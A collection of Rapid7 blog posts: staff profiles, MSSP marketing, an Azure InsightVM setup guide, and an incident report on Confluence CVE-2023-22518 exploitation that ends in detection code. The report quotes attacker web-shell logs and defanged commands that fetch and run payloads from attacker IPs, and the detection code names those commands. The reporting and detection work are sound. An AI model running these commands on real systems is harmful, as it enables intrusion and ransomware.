Jonathan: “Once hired, I would recommend fully taking advantage of the first few weeks of onboarding. A lot of content is self-paced, and it sets a good foundation of how to be successful at Rapid7 as well as imparts information about our products and services. I also recommend new Customer Advisors become certified for InsightIDR. As an employee, you can take the test for free, and it gives you a great foundation to build on. This is also a great time to shadow some calls to get familiar with some common topics and questions that might come up.”

Throughout onboarding and beyond, Jonathan also states the importance of being eager to learn (reflected in Rapid7’s “Never Done” core value).

Jonathan: “For new hires in this role, come in with an open mind and be ready to learn and ask questions. This is a very complex role, and it can be stressful at times due to the nature of our industry. The more you recognize and seek the experience and feedback of those around you, the more successful you will be. Take advantage of opportunities to learn and grow throughout your time here – not just as a new hire.”

Rapid7 is continuing to grow teams in locations around the world. Learn more about career opportunities or browse all open jobs.

A Trusted Voice in a Crowded Market: Meet Joanne Guariglia, Senior Channel Account Manager at Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/05/a-trusted-voice-in-a-crowded-market-meet-joanne-guariglia-senior-channel-account-manager-at-rapid7/

A Trusted Voice in a Crowded Market: Meet Joanne Guariglia, Senior Channel Account Manager at Rapid7

When you’re a seller, it’s important to represent a reputable brand and products you can stand behind. For many companies, their partners act as an extension of the sales team to help identify and engage new customers. As a Senior Channel Account Manager, Joanne Guariglia shares what she loves most about her role, Rapid7, and why now is a great time to join the team.

What is it that initially attracted you to Rapid7?

In my previous role, I was with a company that had an integration with Rapid7, so I had been working in tandem with some of the leadership team. They were always down to earth, very genuine, open and honest about the great things happening, and what some of the challenges were. My partners also enjoyed working with the Rapid7 team and I could see they were making waves in the partner community.

Aside from that, Rapid7 is not just a single solution. Our products can meet customers where they are in their security journey, and grow and scale with them. So having that ability to grow alongside customers was something that I was really interested in.

Would you say a cybersecurity background is required for your role? What skills or knowledge is most important?

I wouldn’t necessarily say a cyber background is a must have before joining Rapid7. We have a comprehensive onboarding program that can help give you a strong foundation in cyber security knowledge as well as our products and services. What’s most important is your ability to grow relationships with our partners and to bring the best technology and solutions to the customer. This is a role where you have to be an effective communicator and a bridge between cross functional teams including Sales, Marketing, Customer Success, Sales Operations, Finance, and the Renewals team to make sure we are aligned on business decisions moving forward. Having that collaboration between teams and knowing we are all working towards the same goal has been really rewarding.

What does the cybersecurity landscape look like, and how does Rapid7 differentiate itself from competitors?

When it comes to the landscape, cyber criminals are always evolving their tactics and continue to increase efforts against businesses of all sizes. Security is not a ‘nice to have’; it’s a priority for all businesses and industries, so it’s a field that’s very stable and always growing.

Cybersecurity can also be challenging because it is a crowded market, but where Rapid7 has a competitive advantage is in consolidation. Our customers don’t have to work with multiple vendors to satisfy all aspects of their security needs; we can consolidate multiple products and offerings into one cost with one vendor. We’ve come a long way in growing our portfolio and responding to the customers’ needs, and we are well positioned to continue that growth into 2024 and beyond.

What do you find most rewarding about your role?

What I enjoy most is being able to build lasting relationships with our partners. Partners want to work with trusted brands that are leaders in the space and we have that here at Rapid7. Being that trusted voice and growing the relationship, while educating them about our offerings, enables me to have a positive impact.

Another thing I find rewarding is the ability to create change and outcomes that our partners find valuable. We are a large company, but we are still agile enough to pivot when needed and our culture is one that is supportive of asking questions and sharing new ideas that we can bring to fruition.

What are you most excited for in 2024?

2024 is exciting because our channel team is at the forefront of impacting growth across the organization. We are investing heavily in our partnerships and partner programs, and are making strides with the channel community more than ever. Our company strategy and goals are really clear, and we’re all excited to execute and drive positive impact for the business.

With incredible product offerings and an opportunity to foster and grow partner relationships, there is no better time to be a part of this journey. 2024 is going to be a huge year for us!

Interested in learning more about working for Rapid7? Click here for our careers page, or view all open sales opportunities.

Building our Team in Prague: Meet Martin Votruba

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/27/building-our-team-in-prague-meet-martin-votruba/

Building our Team in Prague: Meet Martin Votruba

From developing driver-assistance software for a luxury car brand to jumping on board an NFT startup, Martin Votruba, Lead Software Engineer, is not one to shy away from a challenge. In September 2023, he joined Rapid7 as the first hire in its new Prague office. Martin is leveraging the excitement and energy of a startup while having the resources and support of an established organization to build a new team in Prague. He sat down to share his experience as one of the first employees in Prague, and to discuss how Rapid7’s culture of collaboration and continuous learning helped him build a successful foundation on which to grow his team.

How have your past experiences contributed to how you approach your role today?

At Rapid7, my team’s job is to search for reported vulnerabilities and communicate those within our product (InsightVM) so that our customers can determine whether or not they are at risk. With different software vulnerabilities, each case is unique. This makes our job different from traditional engineering where you follow one recipe or code path and deploy it. I’m constantly drawing inspiration from past challenges and experiences to think about how to approach each new case here. I enjoy the opportunity to be creative in identifying solutions and helping our product deliver the best outcomes to our customers.

What was it that initially attracted you to Rapid7?

To be honest, I had never heard of the company before. It was exciting to see that it was starting a new office in Prague, while also having an established team globally to collaborate and partner with. I was looking for an opportunity to grow and learn from others and was interested in a global company. Being able to maintain the excitement and energy of a startup environment by being part of a new office is a unique opportunity. It also is a really fun environment building its own organic culture as new people are excited about working for Rapid7 and joining us every week.

What is something you didn’t realize or expect about Rapid7’s culture?

As far as culture, it was a nice surprise to see that even though Rapid7 is a global company and has larger structures in place, it isn’t so rigid that you are bogged down by processes or unable to feel you are making an impact. For example, right after I joined I had an opportunity to be a part of the interview team for some new roles. I was given that trust automatically to help shape what the office looks like and who we are bringing on board.

Another thing that may be surprising to a lot of people is that even though we are a cybersecurity company, you don’t have to be a cybersecurity expert to have a successful career here. I’m still a software engineer – not a cybersecurity expert (although I’ve learned a lot). What I’m responsible for is still core to my expertise as an engineer, I’m just working within a domain and product that happens to be cybersecurity.

How have you been able to build relationships as a new employee?

We have a really interesting program called “Insight Coffee” that encourages people from around the company to set up 1:1s and get to know one another. There’s no agenda, and it’s truly just to learn about another person’s background, experience, or role. The program opens the door for you to reach out and form relationships in a way that is really approachable and encouraged. If I know I’m going to be working closely with someone on a different team, I’ll set up a quick Insight Coffee to get to know them before diving into a project. That way, when we are working together, it helps open up that avenue of communication and understanding, making the entire process or project run more smoothly.

What was your interview experience like?

After talking with the recruiter about the opportunity, my interview consisted of a call with the Hiring Manager, an interview where we talked about the role and Rapid7’s culture, and a technical challenge. The technical challenge was interesting, and is designed to see how you approach solving a specific problem. Even though I was being assessed on my skills, I felt I was supported and encouraged to ask questions if I was stuck or unsure of something. Now that I am on the other side of this process and helping others with their technical challenge, I know it’s important to understand how someone thinks, what questions they ask, and how they approach the challenge. Of course, getting to the right answer or resolution is the goal, but how they get there and how they approach it is equally important when assessing if someone is the right person for the job. As a manager, I want to bring that same level of support to my team, so they know no matter what challenge they are up against, we are all here to work together and find the best solution as a team.

To learn more about Rapid7’s new office in Prague, click here.
View and apply to Rapid7 jobs in Prague here.

When Maximum Effort Doesn’t Equate to Maximum Results

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/21/when-maximum-effort-doesnt-equate-to-maximum-results/

When Maximum Effort Doesn't Equate to Maximum Results

It’s no secret that security teams are feeling beleaguered as a result of the barrage of data, events, and alerts generated by their security tools, to say nothing of the increased budget scrutiny and constrained staff resources that continue to plague cybersecurity practitioners.

The trick is finding the right balance between how much internal teams have to accomplish themselves versus how much they can cede to managed security service providers (MSSPs).

Historically, success in security operations (SecOps) was measured by how quickly teams could react to incoming threats; but the sheer number of alerts that require humans-in-the-loop to determine the accuracy and severity of security events makes it nearly impossible for teams to keep up. Additionally, the number of tools deployed in a given organization today – to say nothing of the complexity required to make those tools work in concert – means reacting alone won’t get the job done anyway.

Unfortunately, many MSSPs don’t do enough to relieve customers of noisy alerts without expensive consulting agreements, which puts the burden to evaluate and remediate incidents back on already strapped in-house teams.

Traditional approaches have the added disadvantages of being too siloed, too slow, too antiquated for cloud environments, and too convoluted to demonstrate their value. Analysts at a leading research firm predict that within the next 12-18 months, 33% of organizations that currently have internal security functions will attempt and fail to build an effective internal SecOps because of resource constraints such as lack of budget, expertise, and staffing. Analysts further expect that within the next 12-18 months, 90% of internal SecOps will outsource at least 50% of their operational workloads – which makes choosing an MSSP you trust of paramount importance.

MSSPs enable organizations to maximize resilience while minimizing complexity and optimizing staff resources. The best solutions in the market will drive greater efficiency and consolidation by unifying vulnerability management and managed detection and response (MDR) into a single, cohesive security service built by practitioners for practitioners. They will offer 24x7x365 services that “follow the sun” (meaning no one service center is responsible for 100% of support calls; the work is distributed in certified centers of excellence around the world) so that top-notch support is readily available where and when you need it. Complete coverage and end-to-end detection and response services means you can feel confident that your teams are always ready for what comes next.

But it’s important to choose an MSSP that eschews a one-size-fits-all approach. Rather, look for a partner that is dynamic and flexible enough to meet the particular risk profile and business priorities of your organization, one adaptable enough to conform to changes in evolving threats and attack vectors.

Partnering with the right MSSP also allows you to optimize your SecOps for today’s distributed environments, built for the speed and scale of the cloud. Operating in the cloud means you can integrate hundreds of services with the thousands of devices connecting to them seamlessly and in real time; it also means you must protect and secure a sprawling surface with a multitude of potential entry points that threat actors can exploit.

To meet the challenge, choose an MSSP that offers complete coverage from a single, end-to-end solution so that you’re not left responding to an overabundance of events, alerts, and false positives or trying to protect an attack surface too big to contain.

Look for providers that deliver unlimited data, unlimited incident response, and unlimited intelligence so that when a forensic analysis is performed, their detailed remediation and mitigation recommendations make sure you can improve your resilience against future threats. And in the unfortunate event that a breach becomes a full-scope incident-response engagement, you want a partner that will work with you round-the-clock on the forensic investigation and deliver answers that will remove attackers from your environment as quickly as possible – without charging additional consulting fees.

Partnering with a proven MSSP will also boost your visibility across all services and devices to anticipate the most imminent risks, prevent attacks earlier, and respond to events faster. Additionally, an engagement that includes threat exposure manageability at scale through unified endpoint-to-cloud coverage can identify and respond to threats anywhere while breaking down functional and geographic silos that stall efficiency and reduce collaboration.

Critical functions like threat hunting and patch management can be automated across many tools and processes to reduce reliance on manual work. Machine learning and artificial intelligence models can be paired with internal threat telemetry data and chatbots to triage events, increase staff productivity, or produce threat reports that support more targeted and prioritized threat management across the enterprise.

Best of all, the successful use of AI and automation can help reduce the number of tools operating in your environment, which in turn decreases the complexity and cost of security operations.

It’s time to gain the edge over attackers and keep up with the fluid, ever-expanding threat landscape by eliminating threats wherever they emerge and proactively preventing breaches earlier in the kill chain. Partnering with a trusted MSSP will enable you to manage your threat exposure precisely and comprehensively, improve your signal-to-noise ratio, demonstrate tangible ROI from your security investments, and continually advance your security posture.

Learn more about the best criteria to use when reviewing the capabilities of potential MSSP partners.

Setup of Discovery Connection Azure

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/08/setup-of-discovery-connection-azure/

Setup of Discovery Connection Azure

By: fuzzy borders

Are you having trouble trying to get your Azure assets into your InsightVM security console? In this blog post, we wanted to bring additional insight into leveraging the Azure Discovery Connection with InsightVM.

This blog post is brought to you by the Fuzzy Borders project, whose members come from different teams across Rapid7. Our goal is to find answers for requests that may fall into gray (fuzzy) areas. Our past work includes example API calls and SQL queries for InsightVM Security Consoles.

We hope this blog will help you get started with assessing your Azure virtual machines in InsightVM.

There are 3 main areas of configuration: Azure App Registration, IAM Subscription, and InsightVM Discovery Connection configuration.

Here is the overview of the steps:

Azure Configuration

  1. App Registration
  2. API Permissions
  3. Generate and Save the Secret Value
  4. IAM role permissions (Subscriptions Tab)
  5. Attach Reader role to App Registration

InsightVM Discovery Connection Configuration
Prerequisite: Allow outbound traffic to Azure from the InsightVM console server.

  1. Create a new site for Azure assets*
  2. Create Azure Discovery Connection
  3. Enter Azure Tenant ID, Application ID, Application Secret certificate Value

*The Azure Site should be dedicated to this discovery connection only.

Please keep note of the following items:

  • Application ID
  • Directory ID (a.k.a. Tenant ID)
  • Value for the certificate Secret

Configure Azure

We need to establish trust between Rapid7 and Azure. Click on “App registrations”.

Click: New registration

Enter a display name for the application and click Register at the bottom. In this example we use “FuzzyDiscovery”.

We leave the default values. Once you click Register, it will return the Application ID and Directory ID (a.k.a. Tenant ID), which will be required in later steps.

Tip:
Either take a screenshot or copy and paste both the Application ID and Directory ID to a secure location to reference later.

Generate and Save the Secret Value

Click on Certificates & Secrets, click Client Secrets, and add a New Client Secret.

Important Note: We require the generated Secret Certificate Value, not the Secret ID. The value is shown only once, immediately after the secret is created.

Configure API Permissions

Click on “Add a permission”, search for and select “Directory.Read.All”, and then grant admin consent for the permission.

Subscription Access

Click Home, then Subscriptions, to set up the IAM role.

On the Subscriptions page, click Access Control (IAM), and click Add Role Assignment under “Grant access to this resource”.

Select the Reader role.

Enter the member created earlier (example: FuzzyDiscovery).

Configure Console
Prerequisite: Allow outbound access to Azure https://docs.rapid7.com/nexpose/creating-and-managing-dynamic-discovery-connections/#preparing-insightvm

Create a dedicated new Site as a Destination for your Azure assets https://docs.rapid7.com/nexpose/creating-and-managing-dynamic-discovery-connections/#adding-a-microsoft-azure-connection

Create Azure Discovery Connection

Navigate to Administration and click Discovery Connections.

From the Azure App Registration, fill out:

  • Tenant ID
  • Application ID
  • Application Secret certificate Value previously generated in Azure

Please note: if the secret value was not saved previously, a new secret will have to be generated, and the previously generated secret can be revoked.

Troubleshooting Tips:

In the InsightVM console logs, review the eso.log for any errors and provide logs to support via a case.
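The Azure side of the procedure above, done with the Azure CLI instead of the portal, as an added example (not code from Rapid7 or the Fuzzy Borders project). It assumes an existing `az login` session with rights to create app registrations, grant admin consent and assign roles on the current subscription, and that Directory.Read.All is wanted as an application permission; the FuzzyDiscovery display name is reused from the walkthrough, while the RUN_AZURE_SETUP switch, the secret display name and the function names are my own.

```shell
#!/usr/bin/env bash
# Added example: automate the five Azure steps (app registration, API permission,
# client secret, subscription IAM, Reader role) with the Azure CLI. Placeholder
# names only; nothing here is Rapid7's own tooling.

MS_GRAPH_APP_ID="00000003-0000-0000-c000-000000000000"   # well-known Microsoft Graph app ID

# The console needs the secret *value*, not the secret ID (see the Important Note
# above). The ID is a GUID; the value is not. Returns 0 when the argument is safe
# to paste into the discovery connection form.
check_secret_value() {
    if printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$'; then
        echo "error: this looks like a secret ID (GUID), not the secret value" >&2
        return 1
    fi
    [ -n "$1" ]
}

# Step 1: app registration; prints the Application (client) ID.
create_app_registration() {
    az ad app create --display-name "$1" --query appId -o tsv
}

# Step 2: Directory.Read.All application permission on Microsoft Graph, then admin consent.
grant_directory_read() {
    local app_id="$1" role_id
    # Look the permission ID up in the Graph service principal instead of hard-coding it.
    role_id=$(az ad sp show --id "$MS_GRAPH_APP_ID" \
        --query "appRoles[?value=='Directory.Read.All'].id | [0]" -o tsv)
    az ad app permission add --id "$app_id" --api "$MS_GRAPH_APP_ID" \
        --api-permissions "${role_id}=Role"
    az ad app permission admin-consent --id "$app_id"
}

# Step 3: client secret. The value is printed once by this call; capture it now.
create_client_secret() {
    az ad app credential reset --id "$1" --append \
        --display-name "insightvm-discovery" --years 1 --query password -o tsv
}

# Steps 4 and 5: service principal for the app, then Reader on the subscription.
# (Directory replication can lag: if the role assignment reports the principal
# does not exist, wait a few seconds and re-run this function.)
assign_reader_role() {
    local app_id="$1" sub_id="$2"
    az ad sp create --id "$app_id" >/dev/null
    az role assignment create --assignee "$app_id" --role Reader \
        --scope "/subscriptions/$sub_id" >/dev/null
}

main() {
    local name="${1:-FuzzyDiscovery}" tenant_id sub_id app_id secret
    tenant_id=$(az account show --query tenantId -o tsv)
    sub_id=$(az account show --query id -o tsv)
    app_id=$(create_app_registration "$name")
    grant_directory_read "$app_id"
    secret=$(create_client_secret "$app_id")
    check_secret_value "$secret" || exit 1
    assign_reader_role "$app_id" "$sub_id"
    # These three values are what the InsightVM discovery connection form asks for.
    printf 'Tenant ID:      %s\nApplication ID: %s\nSecret value:   %s\n' \
        "$tenant_id" "$app_id" "$secret"
}

# Only touch Azure when explicitly asked; otherwise the file just defines helpers.
if [ "${RUN_AZURE_SETUP:-0}" = "1" ]; then
    main "$@"
fi
```

Run it as `RUN_AZURE_SETUP=1 ./azure-discovery-setup.sh FuzzyDiscovery` and store the printed secret value where the console configuration step can retrieve it.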

Rapid7-Observed Exploitation of Atlassian Confluence CVE-2023-22518

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/06/etr-rapid7-observed-exploitation-of-atlassian-confluence-cve-2023-22518/

Rapid7-Observed Exploitation of Atlassian Confluence CVE-2023-22518

Daniel Lydon and Conor Quinn contributed attacker behavior insights to this blog.

As of November 5, 2023, Rapid7 Managed Detection and Response (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, including for ransomware deployment. We have confirmed that at least some of the exploits are targeting CVE-2023-22518, an improper authorization vulnerability affecting Confluence Data Center and Confluence Server. Atlassian published an advisory for the vulnerability on October 31, 2023. MDR has also observed attempts to exploit CVE-2023-22515, a critical broken access control vulnerability in Confluence that came to light on October 4.

Atlassian updated their advisory for CVE-2023-22518 on November 3 to note that exploitation of the vulnerability had been reported to them by a customer.

Observed attacker behavior

Beginning November 5, 2023, Rapid7 MDR began responding to exploitation of Confluence Server within various customer environments. The alerts we observed occurred between 2023-11-05 10:08:34 and 23:05:35 UTC.

The process execution chain, for the most part, is consistent across multiple environments, indicating possible mass exploitation of vulnerable internet-facing Atlassian Confluence servers.

Rapid7 observed POST requests in HTTP access logs (/atlassian/confluence/logs) on both Windows and Linux. The requests were sent to /json/setup-restore.action?synchronous=true, as seen in the example below:

[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 193.176.179[.]41 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:09 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/?os_authType=basic HTTP/1.1 200 153ms 388712 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 404 3ms 40 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /rest/plugins/1.0/?token=-TOKENNUM HTTP/1.1 202 26ms 344 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:11 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 4ms 229 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 3ms 274 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 27ms 212 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 13ms 283 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 14ms 556 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:18 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 204 129ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
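Triage helpers for an access log in the format excerpted above, as an added example (not Rapid7's detection code): one lists every source that POSTed to the setup-restore endpoint, the other prints the plugin-REST and servlet requests that the same source made afterwards. The sample lines are constructed with documentation addresses in normal dotted form (the excerpt shows addresses defanged with `[.]`), and the function names are my own.

```shell
#!/usr/bin/env bash
# Added example: awk over a Confluence HTTP access log. Field layout per line:
# $1-$2 timestamp, $3 user ("-" when unauthenticated), $4 host, $5 source IP,
# $6 method, $7 path, $8 protocol, $9 status.

# Print "ip user status" for each POST to /json/setup-restore.action. An
# unauthenticated ("-") POST answered with 302 is the pattern in the excerpt.
restore_posts() {
    awk '$6 == "POST" && $7 ~ /^\/json\/setup-restore\.action/ { print $5, $3, $9 }' "$1"
}

# For one source IP, print the plugin-REST and servlet requests that follow its
# first setup-restore POST: the upload-then-invoke sequence of a dropped plugin.
followup_for_ip() {
    awk -v ip="$2" '
        $5 != ip { next }
        $6 == "POST" && $7 ~ /^\/json\/setup-restore\.action/ { seen = 1; next }
        seen && ($7 ~ /^\/rest\/plugins\/1\.0\// || $7 ~ /^\/plugins\/servlet\//) {
            print $1, $3, $6, $7, $9
        }' "$1"
}

# Constructed sample log for a self-check; only the field positions and the
# ordering matter. 203.0.113.5 plays the attacker, 198.51.100.7 a normal user.
write_sample_log() {
    cat > "$1" <<'EOF'
[05/Nov/2023:11:50:01 +0000] alice SYSTEMNAME 198.51.100.7 GET /dashboard.action HTTP/1.1 200 20ms 8123 - Mozilla/5.0
[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 203.0.113.5 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0
[05/Nov/2023:11:56:09 +0000] admin SYSTEMNAME 203.0.113.5 GET /rest/plugins/1.0/?os_authType=basic HTTP/1.1 200 153ms 388712 - Mozilla/5.0
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 203.0.113.5 POST /rest/plugins/1.0/?token=-TOKENNUM HTTP/1.1 202 26ms 344 - Mozilla/5.0
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 203.0.113.5 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 27ms 212 - Mozilla/5.0
[05/Nov/2023:11:57:00 +0000] alice SYSTEMNAME 198.51.100.7 GET /rest/plugins/1.0/ HTTP/1.1 200 10ms 100 - Mozilla/5.0
EOF
}
```

Point `restore_posts` at the access log under the Confluence logs directory named above, then feed each reported IP to `followup_for_ip` to see what it did with the session it obtained.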

Rapid7 managed services observed the following processes on the host systems as part of exploitation:

  • Linux

Parent process:

/opt/atlassian/confluence/jre//bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=XXXX -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-YYYY-MM-DD_XX-XX-XX.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-YYYY-MM-DD_XX-XX-XX.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start

Child process:

/usr/bin/bash -c whoami

Additional Commands (decoded and deobfuscated):

echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru

  • Windows

Parent process:

"DRIVE:\Confluence\Confluence\bin\tomcat9.exe" "//RS//Confluence"

Child processes:

cmd /c whoami 

Additional Commands (decoded and deobfuscated):
IEX((New-Object Net.WebClient).DownloadString("hxxp[:]//193[.]176[.]179[.]41/tmp.37")) 

Post-exploitation behavior

After the initial enumeration activity (the whoami command spawned via Bash), the adversary executed Base64-encoded commands to spawn follow-on commands via python2 or python3.

/usr/bin/bash -c whoami
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
uname -p 2> /dev/null (spawned by /usr/bin/python3.6)
/usr/bin/id -u (spawned by /usr/bin/python3.6)
/bin/chmod +x ./qnetd (spawned by /usr/bin/python3.6)
/bin/chmod 755 ./qnetd (spawned by /usr/bin/python3.6)
/tmp/qnetd (ransomware execution)

----------------------------------------
/usr/bin/bash -c whoami
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru
curl -s hxxp://193.43.72[.]11/mdrg.sh || wget -q -O- hxxp://193.43.72[.]11/mdrg[.]sh)%7Csh 
/usr/bin/cat /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/uname -m (spawned by /usr/bin/bash)
/usr/bin/rm -rf /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/rm -rf sh (spawned by /usr/bin/bash)
/usr/bin/id -u (spawned by /usr/bin/bash) 
/usr/bin/rm -rf ./qnetd (spawned by /usr/bin/bash)
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/bash)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/bash)
/usr/bin/rm -rf ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/uname -p (spawned by /usr/bin/python2.7)
/usr/bin/id -u (spawned by /usr/bin/python2.7) 
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/python2.7)
/tmp/qnetd (ransomware execution)

In multiple attack chains, Rapid7 observed post-exploitation command execution to download a malicious payload hosted at 193.43.72[.]11 and/or 193.176.179[.]41, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.
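The process lineage and access-log artifacts above translate directly into detection logic. The following is an added example (not Rapid7 code, and not the Insight Agent rules named later in this post): it scores parent/child process pairs for a Confluence service process spawning a shell or recon/staging commands, and scores Confluence access-log lines for POSTs to an unexpected plugin servlet and plugin deletions through the UPM REST API. All sample telemetry is constructed to mirror the shapes quoted in the post; the access-log parser assumes the field order shown there, and the allowlisted plugin servlet path is a placeholder.

```python
"""Detection helpers for the CVE-2023-22518 post-exploitation chain described
above. Added example, not Rapid7 code. Sample telemetry is constructed."""
from __future__ import annotations

import re

# Confluence's own service process: Tomcat under the Atlassian JRE on Linux,
# the tomcat9.exe service wrapper on Windows (both quoted in the post).
CONFLUENCE_PARENT = re.compile(
    r"(/opt/atlassian/confluence/.*\bjava\b|tomcat9\.exe.*//RS//Confluence)",
    re.IGNORECASE,
)
# Shell interpreters a wiki application server has no business spawning.
SHELL_CHILD = re.compile(
    r"(^|[\\/])(bash|sh|dash|cmd(\.exe)?|powershell(\.exe)?)\b", re.IGNORECASE
)
# Recon and staging markers taken from the observed command chains.
STAGING_MARKERS = re.compile(
    r"\b(whoami|id -u|uname|chmod (\+x|755)|curl|wget|IEX|DownloadString)\b|/tmp/",
    re.IGNORECASE,
)


def score_process_event(parent: str, child: str) -> list[str]:
    """Reasons a parent->child pair resembles the observed chain ([] = none)."""
    reasons = []
    confluence_parent = bool(CONFLUENCE_PARENT.search(parent))
    if confluence_parent and SHELL_CHILD.search(child):
        reasons.append("confluence_spawned_shell")
    # Follow-on commands ran under bash or python2/python3 started from the
    # web shell, so those interpreters count as a suspicious parent as well.
    staging_parent = confluence_parent or bool(re.search(r"python|bash", parent))
    if staging_parent and STAGING_MARKERS.search(child):
        reasons.append("recon_or_staging_command")
    return reasons


# Confluence access log, fields in the order shown in the post's excerpt:
# [timestamp] user host client METHOD path HTTP/x status ...
ACCESS_LOG = re.compile(
    r"^\[(?P<ts>[^\]]+)\] (?P<user>\S+) (?P<host>\S+) (?P<client>\S+) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\S+ (?P<status>\d{3})"
)
# Placeholder allowlist: plugin servlets known to exist in this deployment.
KNOWN_PLUGIN_SERVLETS = ("/plugins/servlet/com.example.approved/",)


def score_access_log_line(line: str) -> list[str]:
    """Flag POSTs to unexpected plugin servlets and plugin removals via the
    Universal Plugin Manager REST API (the web shell plugin was deleted right
    after use)."""
    m = ACCESS_LOG.match(line)
    if not m:
        return []
    reasons = []
    path, method, status = m["path"], m["method"], int(m["status"])
    if (method == "POST" and status == 200
            and path.startswith("/plugins/servlet/")
            and not path.startswith(KNOWN_PLUGIN_SERVLETS)):
        reasons.append("post_to_unexpected_plugin_servlet")
    if method == "DELETE" and path.startswith("/rest/plugins/1.0/"):
        reasons.append("plugin_removed_via_upm")
    return reasons


def triage(events, access_log_lines):
    """Run both checks; return (source, item, reasons) for every hit."""
    hits = []
    for parent, child in events:
        reasons = score_process_event(parent, child)
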